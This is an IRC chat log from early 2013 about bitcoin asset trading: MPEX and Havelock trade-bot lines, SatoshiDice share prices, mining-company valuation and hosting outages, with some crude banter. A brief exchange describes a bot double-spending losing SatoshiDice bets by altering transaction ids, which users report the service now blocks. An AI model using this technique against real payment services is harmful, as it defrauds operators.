bitcoin definition: https://bitcointalk.org/index.php?topic=141942.0 Feb 08 19:40:03 leotreasure : http://trilema.com/2012/the-reasons-why-bitcoin-securities-cant-be-regulated-by-the-sec/ Feb 08 19:40:12 it's all in there. bitcoin is exactly what wow gold is. Feb 08 19:40:46 i'm *so* done with bitvps Feb 08 19:41:07 if anyone asks about coinbr, they messed it up again Feb 08 19:41:10 thanks mircea_popescu will read it tomorrow it's nearly 5 in the morning now :) Feb 08 19:41:36 hehe no rush, been there for what, half a year now Feb 08 19:41:38 it'll wait a day Feb 08 19:41:44 jurov what happened ? Feb 08 19:42:18 mircea_popescu: what if bitcoin is considered a foreign currency? Feb 08 19:42:24 by whom ? Feb 08 19:43:08 by those interpreting section 1 of the securities act of 1933 Feb 08 19:43:21 which foreign is it a currency of ? Feb 08 19:43:37 doesn't foreign just mean "not domestic"? Feb 08 19:43:43 ... Feb 08 19:43:47 or does it need to be a specific foreign country? Feb 08 19:43:51 a foreign currency is the currency of a definite foreign power. Feb 08 19:44:05 oh, well that answers that then Feb 08 19:45:43 when will bitcoin-legal.org be ready :) Feb 08 19:47:43 it there a bitcoin-legal.org? Feb 08 19:48:17 mircea_popescu my vps is completely inaccessible again Feb 08 19:48:45 is it still bitvps? Feb 08 19:50:05 yes. was thinking i'll give them a chance Feb 08 20:06:56 BitHub: will work on it this weekend Feb 08 20:07:12 hopefully by monday morning Feb 08 20:08:04 actually - the lawyer is calling me on monday so depending on how helpful they are - may have some solid info to put there by end of week Feb 08 20:08:37 bed time for me now Feb 08 20:13:21 :) Feb 08 20:13:28 good stuff Feb 08 20:22:54 [MPEX] [S.MPOE] 333 @ 0.00067985 = 0.2264 BTC [-] Feb 08 20:22:56 [MPEX] [S.MPOE] 2367 @ 0.00067984 = 1.6092 BTC [-] Feb 08 20:24:40 [MPEX] [S.MPOE] 1954 @ 0.00067984 = 1.3284 BTC [-] Feb 08 20:24:42 [MPEX] [S.MPOE] 5000 @ 0.00067983 = 3.3992 BTC [-] Feb 08 20:24:42 [MPEX] [S.MPOE] 96 @ 0.00067976 = 0.0653 BTC [-] Feb 08 20:24:43 [MPEX] [S.MPOE] 10000 @ 0.00067983 = 6.7983 BTC [+] Feb 08 20:29:18 [MPEX] [S.DICE] 500 @ 0.00619997 = 3.1 BTC [-] Feb 08 20:32:54 [MPEX] [S.MPOE] 4321 @ 0.00068003 = 2.9384 BTC [+] Feb 08 20:32:56 [MPEX] [S.MPOE] 6726 @ 0.00067976 = 4.5721 BTC [-] Feb 08 20:33:02 [MPEX] [S.MPOE] 653 @ 0.00067965 = 0.4438 BTC [-] Feb 08 20:33:34 [MPEX] [S.MPOE] 4321 @ 0.00068978 = 2.9805 BTC [+] Feb 08 20:33:35 [MPEX] [S.MPOE] 5000 @ 0.00068994 = 3.4497 BTC [+] Feb 08 20:33:40 [MPEX] [S.MPOE] 4300 @ 0.00068995 = 2.9668 BTC [+] Feb 08 20:33:41 [MPEX] [S.MPOE] 3000 @ 0.00069521 = 2.0856 BTC [+] Feb 08 20:33:43 [MPEX] [S.MPOE] 1829 @ 0.00069523 = 1.2716 BTC [+] Feb 08 20:33:44 [MPEX] [S.MPOE] 3450 @ 0.00069608 = 2.4015 BTC [+] Feb 08 20:41:01 very impressive price action in the face of stiff overhead resistance Feb 08 20:42:43 ;;ticker Feb 08 20:42:43 BTCUSD ticker | Best bid: 22.46002, Best ask: 22.61999, Bid-ask spread: 0.15997, Last trade: 22.46001, 24 hour volume: 52723.05584513, 24 hour low: 21.75001, 24 hour high: 22.70000, 24 hour vwap: 22.30134 Feb 08 20:47:39 [HAVELOCK] [SDICE] 10 @ 0.621 = 6.21 BTC [+] Feb 08 20:50:21 Unknown arg 'PM' ignored. Feb 08 20:50:21 Usage: IGNORE mask - host mask to ignore, eg: *!*@*.aol.com types - types of data to ignore, one or all of: PRIV, CHAN, NOTI, CTCP, DCC, INVI, ALL options - NOSAVE, QUIET Feb 08 20:50:24 gigavps!*@* added to ignore list. Feb 08 20:53:45 [MPEX] [S.MPOE] 1654 @ 0.00067978 = 1.1244 BTC [-] Feb 08 20:53:47 [MPEX] [S.MPOE] 3346 @ 0.00067977 = 2.2745 BTC [-] Feb 08 21:00:12 [MPEX] [S.DICE] 1852 @ 0.00618074 = 11.4467 BTC [-] Feb 08 21:00:14 [MPEX] [S.DICE] 500 @ 0.00615002 = 3.075 BTC [-] Feb 08 21:00:22 [MPEX] [S.DICE] 1000 @ 0.00615001 = 6.15 BTC [-] Feb 08 21:00:24 [MPEX] [S.DICE] 900 @ 0.00611577 = 5.5042 BTC [-] Feb 08 21:00:26 [MPEX] [S.DICE] 1050 @ 0.00600003 = 6.3 BTC [-] Feb 08 21:00:27 [MPEX] [S.DICE] 1000 @ 0.0059043 = 5.9043 BTC [-] Feb 08 21:00:29 [MPEX] [S.DICE] 2100 @ 0.00584205 = 12.2683 BTC [-] Feb 08 21:00:30 [MPEX] [S.DICE] 2356 @ 0.004321 = 10.1803 BTC [-] Feb 08 21:00:36 yup Feb 08 21:00:41 whoa Feb 08 21:01:10 what about my 0042!! Feb 08 21:01:12 :( Feb 08 21:01:19 you will get filled at .0042 Feb 08 21:01:26 I bet you 1 BTC Feb 08 21:01:39 that you will get filled within 1 week at .0042 Feb 08 21:02:05 hmm Feb 08 21:02:09 !ticker m s.dice Feb 08 21:02:10 [MPEX:S.DICE] 1D: 0.004321 / 0.00614105 / 0.00619999 (141427 shares, 868.51 BTC), 7D: 0.0042 / 0.00577226 / 0.007395 (3623200 shares, 20,914.06 BTC), 30D: 0.00085848 / 0.00536784 / 0.0075 (8137912 shares, 43,683.08 BTC) Feb 08 21:02:34 interesting, 50 btcs worth of depth Feb 08 21:04:03 hey mircea_popescu Feb 08 21:04:08 is my mpex account active Feb 08 21:04:55 i have no idea. does it respond ? Feb 08 21:05:12 i dunno Feb 08 21:05:14 havent tried Feb 08 21:05:20 well then. Feb 08 21:05:26 heh Feb 08 21:05:33 i didn't even know you had one Feb 08 21:07:41 i sure do Feb 08 21:07:43 i have everything Feb 08 21:08:18 [MPEX] [S.MPOE] 5000 @ 0.00067978 = 3.3989 BTC [+] Feb 08 21:08:19 [MPEX] [S.MPOE] 975 @ 0.00067977 = 0.6628 BTC [-] Feb 08 21:08:21 [MPEX] [S.MPOE] 10000 @ 0.00067966 = 6.7966 BTC [-] Feb 08 21:08:22 [MPEX] [S.MPOE] 11985 @ 0.00067965 = 8.1456 BTC [-] Feb 08 21:10:23 cool. Feb 08 21:11:06 Volume on SD is insane right now, large bets on low odds also Feb 08 21:12:20 jborkl what are you looking at? Feb 08 21:12:31 wondering the same thing Feb 08 21:12:31 blockchaininfo Feb 08 21:12:40 it streams the info Feb 08 21:12:46 http://www.getoutofdebtfree.org/A4V Feb 08 21:12:49 ahaha this shit kicks all ass. Feb 08 21:12:59 no child left behind, these are the results. Feb 08 21:16:40 well it will be interesting to see when the next block hits Feb 08 21:16:56 cause SD has been dead for a few days Feb 08 21:17:05 I wonder if there are new whale addresses then Feb 08 21:18:25 =) Feb 08 21:18:52 Bugpowder what's the month's volume, do you know ? Feb 08 21:20:14 The volume seems high to me, I have had to wait a long time to get transactions into a block Feb 08 21:21:11 http://blockchain.info/charts/balance?address=1EAwKCEhyBcsZrZUPKYw8M4Lb8VM7Y1ep6 Feb 08 21:21:18 .0043 bids on SDICE on MPEX? Feb 08 21:22:00 I think volume was ~150k Feb 08 21:22:41 bugpowder: s.dice bets? like, today? Feb 08 21:23:53 66btc and 130 btc on 6% Feb 08 21:23:59 just a second ago Feb 08 21:24:09 there have been a bunch going through like that Feb 08 21:24:53 no Feb 08 21:24:55 this month Feb 08 21:26:07 jborkl I think its a red herring Feb 08 21:26:15 look at the specific transactions Feb 08 21:26:34 1BTC is going to SDice address and the rest is going back to the same sending address Feb 08 21:27:17 http://blockchain.info/address/1EAwKCEhyBcsZrZUPKYw8M4Lb8VM7Y1ep6 Feb 08 21:27:45 as far as I can tell, this address is doing most of that betting and is not related to the eight known addresses used by the big whale. Feb 08 21:29:14 so it's quiet Feb 08 21:30:15 yeah Feb 08 21:30:44 Also.... the whale is basically out of coins. Feb 08 21:30:52 from what I can tell Feb 08 21:31:18 he's waiting for his gox deposit Feb 08 21:31:22 lol Feb 08 21:31:22 :) Feb 08 21:31:41 well Feb 08 21:31:46 that IS possible Feb 08 21:31:51 driving up the price Feb 08 21:31:55 of coins Feb 08 21:32:17 50% of price gain is due to whale reloading Feb 08 21:35:36 you know what would be nice, if someone hosted the report that Dooglus makes every day as an on-the-fly web page taht can be refreshed Feb 08 21:35:49 or such Feb 08 21:36:27 yeah. Feb 08 21:36:30 how abotu dooglus himself Feb 08 21:36:54 actually I'd prefer not Feb 08 21:36:58 why? Feb 08 21:37:10 easier to make money if you knowledge is less accessible Feb 08 21:37:48 then dont post the link on the forums Feb 08 21:38:25 or bury it on an mpex page, i dunno Feb 08 21:38:40 it's only a matter of time Feb 08 21:39:03 make your own google doc that pulls the data Feb 08 21:39:21 its not exactly my area of expertise Feb 08 21:39:36 i could learn i guess, I actually asked dooglus to help me figure it out Feb 08 21:39:39 he didnt reply Feb 08 21:39:57 took me 10 minutes of google searching to figure out how to do it. Not my area of expertise either. Feb 08 21:40:24 ya but you're a brain surgeon Feb 08 21:45:35 it's not too hard, the armory dude released his original source Feb 08 21:45:43 did dooglus release his modifications? Feb 08 21:46:21 he referred me to the bitarmory py file Feb 08 21:46:29 i thought he didn't answer Feb 08 21:46:37 is there still a bot doing a doublespend attack on sdice failed bets? Feb 08 21:46:39 this was before that Feb 08 21:46:48 in the thread on bctalk Feb 08 21:47:02 i was asking him how to use it Feb 08 21:47:16 adding a NOOP to the end of a transaction that was a losing bet Feb 08 21:47:26 changing the txid without having to resign the transaction Feb 08 21:47:58 iirc that kinda failed ? Feb 08 21:48:21 it does fail, sdice ignores txns with inputs that it already saw in bets Feb 08 21:49:03 it was annoying though - I was messing around with the blockchain.info api by spending 0.01 on sdice; about half the time after I'd lose I'd see a doublespend show up in my wallet Feb 08 21:49:19 heh Feb 08 21:49:55 and then going to the address on blockchain.info would show a warning "THIS ADDRESS HAS ATTEMPTED TO SEND DOUBLESPENDING TRANSACTIONS. USE CAUTION WHEN RECEIVING MONEY FROM THIS ACCOUNT" Feb 08 21:50:49 paraphrased but roughly that Feb 08 21:52:27 [MPEX] [S.MPOE] 11654 @ 0.00068862 = 8.0252 BTC [+] Feb 08 21:53:57 wtf is up with s.dice market depth Feb 08 21:54:19 the spread is almost .0019 Feb 08 21:54:19 it never was very deep on the book Feb 08 21:54:29 somebody just took a dump Feb 08 21:55:05 what do the spreads look like elsewhere? Feb 08 21:55:08 there are over 3 million shares bid and 5 million asks. Feb 08 21:55:24 there is just a disagreement on value right now :- Feb 08 21:55:39 [MPEX] [S.MPOE] 4321 @ 0.00068929 = 2.9784 BTC [+] Feb 08 21:55:41 [MPEX] [S.MPOE] 1929 @ 0.00068957 = 1.3302 BTC [+] Feb 08 22:01:01 a few people made a lot of money Feb 08 22:01:37 well, not a lot Feb 08 22:01:39 but about $12k Feb 08 22:03:00 yea just a few kilo-mugs Feb 08 22:07:40 swhitt depends. if you coutn appreciation then people made something like 20-30k btc Feb 08 22:08:06 mircea_popescu: yeah, I meant single holders Feb 08 22:08:26 the whales were grabbing 100-250k shares in the first two tranches right? Feb 08 22:08:52 there were blocks as large as i think 2-3 mn going at once Feb 08 22:09:19 but what do you mean single holders ? whales are single too, i'd hope Feb 08 22:09:25 or else they'll get raped with divorce. Feb 08 22:09:29 haha Feb 08 22:09:32 lol Feb 08 22:09:39 It was kind of hard to digest in the channel Feb 08 22:09:48 is there a feed of current trades somewhere else? Feb 08 22:09:50 and historical data too Feb 08 22:09:58 or wysiwyg Feb 08 22:10:17 in FAQ there's RSS feed Feb 08 22:10:42 and historical data up to 1 mn ago can be got from live.coinbr.com Feb 08 22:10:55 you can get the rss feed, Feb 08 22:10:59 or follow the twitter. Feb 08 22:11:01 (I don't advertise it, but from js sources is obvoius how) Feb 08 22:11:20 yeah I saw those, but I should be keeping my own records if I want day-week long data Feb 08 22:11:31 sgnb smickles Smoovious SomeoneWeird spilk SpNg swhitt Feb 08 22:11:36 swhitt do so, charge a fee. Feb 08 22:11:37 ? Feb 08 22:12:04 tempting Feb 08 22:15:04 i wonder how often s.dice runs out of confirmed coins for payouts Feb 08 22:15:15 in their reserve accts Feb 08 22:15:45 basically never Feb 08 22:16:02 it seems to have to wait for the next block fairly often even when playing with aged coin and a larger-than-required txn fee Feb 08 22:17:03 swhitt you mean sdice issues the txs only after new block appears? Feb 08 22:17:16 most of the time it's incredibly fast Feb 08 22:17:36 unless your inputs aren't confirmed or you don't pay a large enough transaction fee Feb 08 22:17:44 i guess if a whale owns them Feb 08 22:18:16 sometimes it won't process any transaction at all until the bet is confirmed Feb 08 22:18:20 hm, that's possible Feb 08 22:18:33 ;;seen namworld Feb 08 22:18:33 namworld was last seen in #bitcoin-assets 10 hours, 35 minutes, and 54 seconds ago: Eh Feb 08 22:18:41 it seems more probable if I bet 5 btc than if I bet .1 btc though Feb 08 22:18:50 they had to tighten their anti-dblspend measures Feb 08 22:18:59 [MPEX] [S.MPOE] 4321 @ 0.00068939 = 2.9789 BTC [-] Feb 08 22:19:00 [MPEX] [S.MPOE] 17633 @ 0.00068957 = 12.1592 BTC [+] Feb 08 22:19:14 I wonder if it's a result of anti-fraud heuristics or something else Feb 08 22:19:25 http://bitcoin.stackexchange.com/questions/7338/is-it-possible-to-buy-or-sell-bitcoin-options/7341#7341 Feb 08 22:19:31 lol meni rosenfeld getting uppity. Feb 08 22:19:48 how is it that every two bit scammer and scammer wananbe is so quick to declare mpex bad in some way/attack me personally ? Feb 08 22:20:08 don't they realise that by now it's so typical they might as well declare themselves scammers ? Feb 08 22:22:21 uhm..you have to unfold my coinbr comment below it to see it... if anyone has SE account, pls upvode Feb 08 22:22:26 *upvote Feb 08 22:22:41 mircea_popescu why do haters hate? Feb 08 22:23:02 why give them any attention? your time is best served elsewhere Feb 08 22:23:30 http://answers.yahoo.com/question/index?qid=20100526194400AA6ZBSX Feb 08 22:23:36 ^ notice Best Answer Feb 08 22:23:40 lol Feb 08 22:24:11 lol Feb 08 22:24:13 we're surrounded by trauma survivors Feb 08 22:24:20 more power to them Feb 08 22:25:28 [MPEX] [S.MPOE] 5000 @ 0.00069574 = 3.4787 BTC [+] Feb 08 22:25:30 [MPEX] [S.MPOE] 63 @ 0.00069608 = 0.0439 BTC [+] Feb 08 22:32:44 [MPEX] [S.MPOE] 23150 @ 0.00069251 = 16.0316 BTC [-] Feb 08 22:42:57 Namworld: how many days left? Feb 08 22:43:36 7 days from forum time of op post, 24h extension from last bid Feb 08 22:44:05 February 04, 2013, 12:45:15 AM I see. It's now 04:43:42 PM Feb 08 22:44:40 so still another 3 days? Feb 08 22:45:14 yeah, it's a week auction, with extensions Feb 08 22:45:29 So if someone is outbid, they have time to come back Feb 08 22:45:44 still .35? Feb 08 22:45:54 .41 - .43 Feb 08 22:45:58 insanity. Feb 08 22:46:11 not bad Feb 08 22:48:06 how the fuck would that thing make 160k btc ? Feb 08 22:48:52 they mine 6k blocks ? Feb 08 22:49:26 well Feb 08 22:49:28 Cheap asic boards/electricity, chinese manufacturer, mining for itself + selling ASIC boards? Feb 08 22:49:31 thats possible Feb 08 22:49:39 oh wait Feb 08 22:49:41 no its not Feb 08 22:49:43 right. Feb 08 22:50:10 i mean ok, they sold for .1, were mostly worthless, now they've recouped most of their origianl value Feb 08 22:50:15 no it is Feb 08 22:50:15 0.06. 0.08 if you're excited Feb 08 22:50:27 if BFL doesnt ship Feb 08 22:50:33 avalon does poorly Feb 08 22:50:36 bf will ship in may Feb 08 22:50:45 have someone experience with avalon? Feb 08 22:50:46 you might get .4 after 6 months Feb 08 22:50:47 wao if ever Feb 08 22:50:52 If they keep rolling out enough for 1/4th of the total hashing, would get them 36 block per day Feb 08 22:50:54 Bugpowder do the math for my benefit. Feb 08 22:51:00 [MPEX] [S.MPOE] 5000 @ 0.00069573 = 3.4787 BTC [+] Feb 08 22:51:02 [MPEX] [S.MPOE] 4321 @ 0.00069607 = 3.0077 BTC [+] Feb 08 22:51:05 [MPEX] [S.MPOE] 1487 @ 0.00069608 = 1.0351 BTC [+] Feb 08 22:51:05 ;;calc 25*6*24*7*12 Feb 08 22:51:06 [MPEX] [S.MPOE] 10000 @ 0.00069608 = 6.9608 BTC [+] Feb 08 22:51:06 302400 Feb 08 22:51:06 [MPEX] [S.MPOE] 15090 @ 0.00069609 = 10.504 BTC [+] Feb 08 22:51:09 that would take them 166 days to mine 6k blocks Feb 08 22:51:11 [MPEX] [S.MPOE] 11129 @ 0.00069656 = 7.752 BTC [+] Feb 08 22:51:13 [MPEX] [S.MPOE] 2073 @ 0.00069897 = 1.449 BTC [+] Feb 08 22:51:24 166 days ? so till what, august ? Feb 08 22:51:39 what is the designed hash rate? Feb 08 22:51:42 yeah. If they roll enough ASICs to keep 1/4th of hashing Feb 08 22:51:57 Bugpowder something like 10-20TH from what i gather. Feb 08 22:52:15 and what are that .numbers for? Feb 08 22:52:16 :) Feb 08 22:52:26 ;;calc 25*6*24*7*4*6/3 Feb 08 22:52:26 201600 Feb 08 22:52:26 wao the asicminer share price Feb 08 22:52:33 oh :) Feb 08 22:52:45 like devda.ch is doing? Feb 08 22:52:46 O_O Feb 08 22:52:46 6 months with 1/3 the network power = 201600 coins Feb 08 22:52:51 mmm Feb 08 22:53:04 people just want to be miners Feb 08 22:53:12 its an ego thing Feb 08 22:53:12 Mircea, they have 800 boards for 10-12 TH and plan 6x more soon Feb 08 22:53:16 I just planning SC single from BF Feb 08 22:53:17 Bugpowder so iyo a correct discount value of 6 months with 1/3 the network power is 160k ? Feb 08 22:53:20 but I'm still not sure Feb 08 22:53:48 people are not rational with mining Feb 08 22:53:53 i agree, people want to be "part of" btc. Feb 08 22:53:58 yeah Feb 08 22:54:03 instead of obeying mpoe-pr, getting into the wot and working their ass off Feb 08 22:54:03 it's like a cool thing Feb 08 22:54:06 I'm in this club Feb 08 22:54:13 they are independant freemen on the land sovereign citizens Feb 08 22:54:16 and such bs. Feb 08 22:54:30 I liked being in the club too but my apartments smelled of PCB then Feb 08 22:54:34 so I left the club Feb 08 22:54:43 and bought coins instead Feb 08 22:54:49 BEST DECISION OF MY LYFE Feb 08 22:54:53 myeah. Feb 08 22:55:23 actually probably about the 7th or 8th best decision of my life. Feb 08 22:55:28 which is up there! Feb 08 22:57:42 http://www.youtube.com/watch?feature=player_embedded&v=GUZuyMVdVcc#! Feb 08 23:09:30 http://trilema.com/2013/in-which-we-discuss-datskovskiys-discussion-of-mpex/ Feb 08 23:09:47 both this and OP very good food for thoughts, thanks! Feb 08 23:11:57 i should make coinbr db public, too... Feb 08 23:12:51 maybe it wouldn't necessary to encrypt it , too. just use substring or hash of everyone's btc addy Feb 08 23:12:54 hmm Feb 08 23:13:02 I have to pay to access that article now Feb 08 23:14:42 got better idea - use sha1(btc_addy+mpsic) : balance Feb 08 23:16:55 [MPEX] [S.MPOE] 10550 @ 0.00069388 = 7.3204 BTC [-] Feb 08 23:16:57 [MPEX] [S.MPOE] 3301 @ 0.0006926 = 2.2863 BTC [-] Feb 08 23:17:48 havelock investments API now available :) Feb 08 23:17:54 not complete yet, but its a start Feb 08 23:18:01 to weet peoples appetite Feb 08 23:20:38 [MPEX] [S.MPOE] 537 @ 0.00069897 = 0.3753 BTC [+] Feb 08 23:20:40 [MPEX] [S.MPOE] 15000 @ 0.00069898 = 10.4847 BTC [+] Feb 08 23:20:45 [MPEX] [S.MPOE] 10063 @ 0.00069956 = 7.0397 BTC [+] Feb 08 23:28:39 jurov glad you enjoyed Feb 08 23:29:11 just i'm at a loss how to explain whole concept to anone else Feb 08 23:29:19 lol Feb 08 23:29:21 welcome to the club. Feb 08 23:29:41 i'm going into bit of a coworking Feb 08 23:30:06 the guys are really nice, but... seems i'll stay alone with anything mpex-related Feb 08 23:30:27 [13:00] [MPEX] [S.DICE] 2356 @ 0.004321 = 10.1803 BTC [-] wonder why that doesnt show on coinbr's graph Feb 08 23:30:32 jurov ? Feb 08 23:30:55 hrm looks like it died Feb 08 23:31:20 cause of the bitvps snafu...i'll replenish the db from other machine Feb 08 23:32:45 kk :) Feb 08 23:32:48 thanks jurov Feb 08 23:32:49 lol they just chose to cut the fiber or whatever exactly when i wanted to demo coinbr Feb 08 23:32:55 what bitvps snafu ? i miss something? Feb 08 23:33:25 cogent said someone cut their cable or the like Feb 08 23:33:36 bvps only has one upstream? 0,o Feb 08 23:33:41 the one that serviced bitvps zurich dc Feb 08 23:33:47 ah Feb 08 23:34:14 yea, they didn't reply to my mention of backup connectivity Feb 08 23:34:36 mircea, typo Feb 08 23:34:49 motley crue > motley crew Feb 08 23:35:15 was kinda a joke. Feb 08 23:35:29 Well if you're comparing them to the band... Feb 08 23:36:15 if i won't find anything decent 15ms from here, most likely i'll buy 30mbit to my flat and run whole thing straight fom here Feb 08 23:36:34 jurov what if there's a fire ? Feb 08 23:36:53 for that there will be that public db :D Feb 08 23:37:13 hehe ok Feb 08 23:37:55 but i believe february earnings will allow me to get serious solution... it looks i already made more than whole january so far Feb 08 23:39:07 that's pretty good. Feb 08 23:39:34 btw namworld, you didn't realize i'm speaking of your company's performance here.. don't you have any comment? Feb 08 23:41:08 holy titfuck Feb 08 23:41:15 dice went 4xx? Feb 08 23:42:46 thanks for the heads up. Feb 08 23:43:01 just dumped the last few hundred of my .0055s Feb 08 23:43:17 haha, bitfunder s.dice doens't look so hot now. Feb 08 23:52:39 hey guys - I'd like some feedback Feb 08 23:53:09 I'm thinking of leaving the 1m tranche up for another 24 hrs, then removing it completely since the market doesn't seem to want it Feb 08 23:53:12 thoughts? Feb 08 23:53:28 remove it now Feb 08 23:53:29 aye. Feb 08 23:53:42 ;) Feb 08 23:53:56 i do not gamble so i have no opinion Feb 08 23:53:59 erik, i have an idea. why dont we advertise on rich kids of instagram? :3 Feb 08 23:54:06 hahah Feb 08 23:54:09 that's actually awesome idea Feb 08 23:54:16 what's the link? Feb 08 23:54:21 hang on Feb 08 23:54:33 http://richkidsofinstagram.tumblr.com/ Feb 08 23:55:05 I noticed they re-post images from time to time Feb 08 23:55:28 huh? the only re post they did was the recap from last year Feb 08 23:55:32 otherwise they put new pics Feb 08 23:56:00 sending them an email now Feb 08 23:56:02 evoor: announce a re-price date and time for the unsold mil at .0044 again :) Feb 08 23:56:14 no thanks ;) Feb 08 23:56:22 .0044 won't be happening again Feb 08 23:56:26 yeah it was a bad idea to sell at 0.44 Feb 08 23:56:26 sad Feb 08 23:56:34 someone quickl.y cashed out Feb 08 23:56:39 im sure that was not your intention Feb 08 23:56:47 nope, but good lesson! Feb 08 23:56:52 evoorhees, I'd say just leave the slice and put the 2 others higher and leave them there. Feb 08 23:57:02 evoorhees: yes to removing the 1M tranche Feb 08 23:57:04 People will eat it eventually Feb 08 23:57:07 i dont know if the low price was the problem, so much as announcing the next tranches would be higher Feb 08 23:57:27 i was tempted to flip what i bought too Feb 08 23:57:27 put the tranche at 0.0075 or higher Feb 08 23:57:30 it'll sell eventually Feb 08 23:57:32 but i wanted to hold Feb 08 23:57:54 you actually sent rich kids of instagram an email? Feb 08 23:57:57 awesome :3 Feb 08 23:58:03 I think I'll announce this one will be up for another 24 hrs, then gone indeffinitely Feb 08 23:58:07 no other tranches for now Feb 08 23:58:10 it doesn't much matter Feb 08 23:58:14 bowjob - about it Feb 08 23:58:17 about to* Feb 08 23:58:24 cool omg lol Feb 08 23:58:26 This is what matters Feb 08 23:58:26 15HJgkvj6roZQvNRC3pUJNKP2YgfEuD8wo Feb 08 23:58:39 1A3z7M6GhpUejQ5eqgSyjVWRuezeepdKKV Feb 08 23:58:46 evoorhees: that's great! it might stimulate some buying action Feb 08 23:58:51 1B5h9sf6xNLYGa3NBk48hwYbxyNZ22PRJk Feb 08 23:58:56 or at least higher bids Feb 08 23:59:06 this higher price is killing me Feb 08 23:59:08 >_> Feb 08 23:59:10 1DBH7Xum2re7LXd8YNSe1uRznttsqeMXGK Feb 08 23:59:23 [MPEX] [S.MPOE] 700 @ 0.00069261 = 0.4848 BTC [-] Feb 08 23:59:24 1EP4rM8hLZCRSWPNZDWJp9zdvmoWYkkgbQ Feb 08 23:59:25 [MPEX] [S.MPOE] 1020 @ 0.0006926 = 0.7065 BTC [-] Feb 08 23:59:26 so whatever happened to pirate dude Feb 08 23:59:28 [MPEX] [S.MPOE] 3043 @ 0.00069252 = 2.1073 BTC [-] Feb 08 23:59:29 you get the idea Feb 09 00:00:01 evoorhees prolly just leave it there Feb 09 00:00:14 good to have something on the books. Feb 09 00:00:50 I would leave it up Feb 09 00:01:07 the fancies of MPEX users cannot be predicted Feb 09 00:01:12 for srsly. Feb 09 00:01:19 leave it up, but higher price Feb 09 00:01:25 lol Feb 09 00:01:32 that highest trade was 0.0075, set it to that Feb 09 00:01:41 [MPEX] [S.MPOE] 1457 @ 0.00069252 = 1.009 BTC [-] Feb 09 00:01:42 [MPEX] [S.MPOE] 8431 @ 0.00069251 = 5.8386 BTC [-] Feb 09 00:01:43 break it into a million pieces Feb 09 00:02:03 it was funny to look at the graph yest Feb 09 00:02:08 looked like an amortised oscillation Feb 09 00:04:16 okay email sent to rich kids of instagram hah Feb 09 00:04:24 mircea_popescu: you must own a maybach Feb 09 00:04:40 why ? Feb 09 00:05:16 cause they are awesome Feb 09 00:05:43 i'm not owning any cars atm Feb 09 00:06:34 TESLA Feb 09 00:07:02 you're such a hipster. Feb 09 00:07:22 mircea_popescu: you are the hipster Feb 09 00:07:33 me ?! why ? Feb 09 00:07:58 "had bitcoins before they were cool" Feb 09 00:08:01 http://i.imgur.com/pnc7FNk.jpg Feb 09 00:08:13 no wai ? i only bought in after the bubble burst Feb 09 00:08:20 http://www.youtube.com/watch?v=VLCdP6sMN9k Feb 09 00:09:24 http://polimedia.us/dtng/c/src/136036121335.jpg Feb 09 00:09:28 since we're comparing performance. Feb 09 00:09:37 nsfw Feb 09 00:09:40 im guessing Feb 09 00:10:23 dtng is the new way to say nsfw Feb 09 00:12:55 http://dtng.info/ Feb 09 00:12:59 live.coinbr data fixed. enjoy Feb 09 00:14:34 hm, medicinal medication...sadly don't have any around Feb 09 00:14:55 must make do with a wine Feb 09 00:16:41 [HAVELOCK] [SDICE] 1 @ 0.61999999 BTC [-] Feb 09 00:20:33 http://jcpham.files.wordpress.com/2013/02/supra-alley.jpg Feb 09 00:20:56 da fuck Feb 09 00:21:28 https://bitcointalk.org/index.php?topic=101902.msg1513113#msg1513113 Feb 09 00:21:40 [HAVELOCK] [SDICE] 4 @ 0.61999999 = 2.48 BTC [-] Feb 09 00:22:11 wanna take that bet Bugpowder Feb 09 00:22:20 hi all Feb 09 00:22:41 tsk tsk evoorhees, such machinations... Feb 09 00:22:48 hi mjr_ Feb 09 00:22:53 sure Feb 09 00:23:16 put it on bbet? Feb 09 00:23:33 Yeah Feb 09 00:23:35 want me to? Feb 09 00:23:37 or you Feb 09 00:23:38 ? Feb 09 00:23:50 Feb 15? Feb 09 00:24:40 hm ok Feb 09 00:24:41 0.0042 ? Feb 09 00:25:07 sure Feb 09 00:25:24 this is manipulateable though Feb 09 00:25:34 I won't manipulate it Feb 09 00:25:35 myea Feb 09 00:25:38 but someone else might Feb 09 00:25:42 not a huge depth Feb 09 00:26:04 [MPEX] [S.MPOE] 1000 @ 0.00068864 = 0.6886 BTC [-] Feb 09 00:26:06 [MPEX] [S.MPOE] 1000 @ 0.00068863 = 0.6886 BTC [-] Feb 09 00:26:21 evoorhees: it'll be interesting to see if that announcement stimulates any buying activity in the next 24 hours Feb 09 00:26:31 yeah we'll see Feb 09 00:26:36 but I learned not to suprise anyone Feb 09 00:26:44 so I'm posting the announcement ahead of time :) Feb 09 00:27:06 if you're gonna do surprises, do it anonymously Feb 09 00:27:15 it might spark some buying actually Feb 09 00:27:41 [HAVELOCK] [SDICE] 1 @ 0.61999999 BTC [-] Feb 09 00:30:48 CHINESE! Feb 09 00:34:06 [MPEX] [S.DICE] 500 @ 0.00619997 = 3.1 BTC [+] Feb 09 00:34:10 [MPEX] [S.DICE] 9291 @ 0.00619998 = 57.604 BTC [+] Feb 09 00:36:34 ;;ticker Feb 09 00:36:34 BTCUSD ticker | Best bid: 22.60982, Best ask: 22.69989, Bid-ask spread: 0.09007, Last trade: 22.60982, 24 hour volume: 48550.75701377, 24 hour low: 22.00000, 24 hour high: 22.70000, 24 hour vwap: 22.39278 Feb 09 00:36:45 banging the roof Feb 09 00:40:42 reading http://negosentro.com/index.php/articles/mybiz/ideas/741-bitcoins-the-fast-rising-star-of-gaming Feb 09 00:41:12 maybe casacsius should offer rouletts/poker chips? that would be perfect Feb 09 00:41:38 especially for rkoi, lol Feb 09 00:42:37 we eastern europeans should raise money for such casino, really Feb 09 00:42:56 I feel like I've read this article before Feb 09 00:43:46 then go to slovak or whatever govt and make them drool Feb 09 00:44:17 if necessary Feb 09 00:45:49 but prolly easier to go offshore Feb 09 00:46:37 mircea, we can IPO this... buy a ship, make offshore btc-only casino Feb 09 00:47:24 sounds like a job for sealand Feb 09 00:48:22 just b4 maiden voyage, btc will skyrocket :DD Feb 09 00:48:24 jurov: you can buy a decen size rig for 250k Feb 09 00:48:27 w/ generator Feb 09 00:48:34 enough for about 5 tables Feb 09 00:48:41 not that I have looked at that already >,> Feb 09 00:48:42 <,< Feb 09 00:48:42 [MPEX] [S.MPOE] 3412 @ 0.00069188 = 2.3607 BTC [+] Feb 09 00:48:43 [MPEX] [S.MPOE] 4321 @ 0.00069501 = 3.0031 BTC [+] Feb 09 00:48:46 [MPEX] [S.MPOE] 2467 @ 0.00069518 = 1.715 